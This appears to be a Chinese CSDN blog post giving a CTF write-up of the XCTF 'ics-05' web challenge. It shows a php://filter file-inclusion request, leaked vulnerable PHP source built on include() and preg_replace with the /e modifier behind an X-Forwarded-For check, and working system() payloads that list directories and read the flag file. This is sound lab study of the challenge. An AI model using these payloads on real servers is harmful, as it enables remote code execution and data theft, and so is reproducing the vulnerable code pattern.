xctf攻防世界 Web高手进阶区 ics-05

已于 2022-08-09 10:09:31 修改
阅读量7.4k 收藏 1
点赞数
分类专栏: 攻防世界web之路 文章标签: php 开发语言
于 2022-08-09 10:06:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l8947943/article/details/126240947
版权

0x01. 进入环境,查看内容

如图:
在这里插入图片描述

给了一张乱七八糟的图,只有设备维护中心可以点击,如图:

在这里插入图片描述
看不出什么内容,再次点击云平台设备维护中心,发现url有猫腻,如图:

在这里插入图片描述
emmm,看到此处,显示了一个index,猜测page肯定是重点。

0x02. 问题分析

0x02_1. php伪协议

什么是php伪协议?这里我参考大佬总结博客:
PHP伪协议详解

page参数一般是文件包含,利用php伪协议读出源码并把它base64编码输出(要不然就直接在网页上执行看不到源码了),这里的命令是:

/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

前端返回结果如图:
在这里插入图片描述
明显的base64编码,丢入base64解码,得到一个php解码文件,如图:
在这里插入图片描述
我们将代码拷出来,进行后续的分析。

0x02_2. 代码分析

截取部分有用代码进行分析,如下:

<?php
$page = $_GET[page];  		# 拿到url中传递的 page参数
if (isset($page)) {   		# 要求拿到的page参数不为空

if (ctype_alnum($page)) {   # ctype_alnum检查$page是否都是字母数字,若都是字母数字则返回ture
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p> # 显示page内容
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) { #返回input在$page中出现的第一个匹配的位置,若未找到返回flase
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') { # #返回index.php在$page中出现的第一个匹配的位置,若未找到返回flase
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />
<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

# 此段代码表示,提交过来的参数携带X_FORWARDED_FOR=127.0.0.1,则执行如下代码
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { 
    echo "<br >Welcome My Admin ! <br >";
    # 参数中包含pat参数,rep参数,sub参数
    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];
	# 要求pat、rep、sub参数都不为空
    if (isset($pattern) && isset($replacement) && isset($subject)) {
    	# 调用preg_replace( mixed $pattern , mixed $replacement , mixed $subject)函数,其中
    	# $pattern: 要搜索的模式,可以是字符串或一个字符串数组。
    	# $replacement: 用于替换的字符串或字符串数组。
    	# $subject: 要搜索替换的目标字符串或字符串数组。
    	# 注意,pattern后添加/e 修正符,则会使 preg_replace() 将 replacement 参数当作 PHP 代码。
    	# 提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含preg_replace() 的行中出现语法解析错误。
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }
}
?>
</body>
</html>

0x02_3. 构造payload

在burpsuite中添加x-forwarded-for: 127.0.0.1,如图,得到Welcome My Admin !
在这里插入图片描述
接着构造pat等参数,payload如下:

/index.php?pat=/123/e&rep=system('ls')&sub=123

在这里插入图片描述
发现有s3chahahaDir文件,构造payload如下:

/index.php?pat=/123/e&rep=system('ls+s3chahahaDir')&sub=123

返回结果如图:
在这里插入图片描述
发现有个flag文件夹,那么我们继续查看,构造payload:

/index.php?pat=/123/e&rep=system('ls+s3chahahaDir/flag')&sub=123

返回结果如图:
在这里插入图片描述
出现了一个flag.php文件,继续构造payload如下:

/index.php?pat=/123/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=123

返回结果如图:
在这里插入图片描述

0x02_4. 得到最终答案

最终答案为: cyberpeace{0002b4d7b2d0858ebb6e13df4b966bd2}

0x03. 总结

这个题目后面不难,最难的是一开始使用php伪协议,其次是php代码审计。这儿是知识盲区,慢慢积累吧

l8947943
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1072
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
攻防世界web进阶ics-05 详细wp
zhwho的博客
09-10 4597
攻防世界web进阶ics-05 wp 题目网站 根据题目提示选择设备维护中心,或者简单粗暴的全都点一遍,发现也只有设备维护中心能点开 打开后 F12 调网页源码 查看后发现 ?page=index 有page这个get参数 自然联想到可能存在利用文件包含读取网页源码的漏洞 这里给出利用php内置filter协议读取文件的代码 ?page=php://filter/read=convert....
攻防世界ics-05PHP伪协议+代码审计+Linux指令)
2302_79800344的博客
04-08 1172
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
攻防世界——ics-05
m0_62063669的博客
06-21 2154
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界-ics-05-(详细操作)做题笔记
qq_43715020的博客
06-15 1441
攻防世界-ics-05-(详细操作)做题笔记
【愚公系列】2023年05攻防世界-Webics-05
时光隧道
05-26 7717
preg_replace 函数是一个正则表达式替换函数,它可以在字符串中执行搜索和替换操作。其中,$pattern是一个正则表达式,是要替换的字符串或字符串数组,$subject是要搜索和替换的原始字符串。使用了不安全的正则表达式:有些正则表达式可能会导致漏洞。例如,使用未经转义的特殊字符,如反斜杠、圆括号和方括号等,可能导致语法错误或意外的行为。使用用户提供的数据作为正则表达式或替换字符串:如果不正确地处理用户提供的数据,攻击者可能会注入恶意代码,导致代码执行或任意文件读取。
攻防世界web——ics05
manerzi的博客
10-24 870
攻防世界web——ics05
攻防世界ics-05】解题方法
weixin_43923736的博客
06-21 818
攻防世界ics-05】解题方法
XCTF攻防世界web.doc
09-19
0x01 view-source 【题目描述】 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 【目标】 学会查看源代码 【工具】 firefox浏览器 【分析过程】 ...在url中提交后便可访问页面源码,在...
XCTF-Mobile】新手练习-05-easyjni.apk
08-05
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjni
XCTF-Mobile】新手练习-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 487
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 848
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
Android配置环境
u012627628的博客
04-24 313
执行命令:sudo mv /home/用户名/Downloads/android-sdk-linux /usr/java。sudo mv /home/用户名/Downloads/jdk1.8.0_271 /usr/java。执行命令:/usr/java/android-sdk-linux/tools/android。执行命令:tar -zxvf android-sdk-linux.tgz。执行 source /etc/profile。验证是否安装成功(我验证是成功的)执行:java -version。
PHP】sign加签方法示例
最新发布
q8688的博客
04-25 337
【代码】【PHP】sign加签方法示例。
bugku ezbypass
m_de_g的博客
04-23 224
bugku ezbypass $++,$_++
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
wyqshusan的博客
04-23 570
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实时导航、实时错误检查和代码重构等实用功能。在新版本中,PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其中包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
web-ics-05
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X-forwarded-For=127.0.0.1。\[2\] - preg_replace函数可以执行正则表达式的搜索和替换。\[3\] 根据这些信息,我们可以推测"web-ics-05"可能是一道关于入侵和利用管理平台的题目,要求读取文件并进行一些操作,同时还需要使用preg_replace函数进行正则表达式的搜索和替换。具体的题目要求和操作细节可能需要进一步的信息才能确定。 #### 引用[.reference_title] - *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

l8947943

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值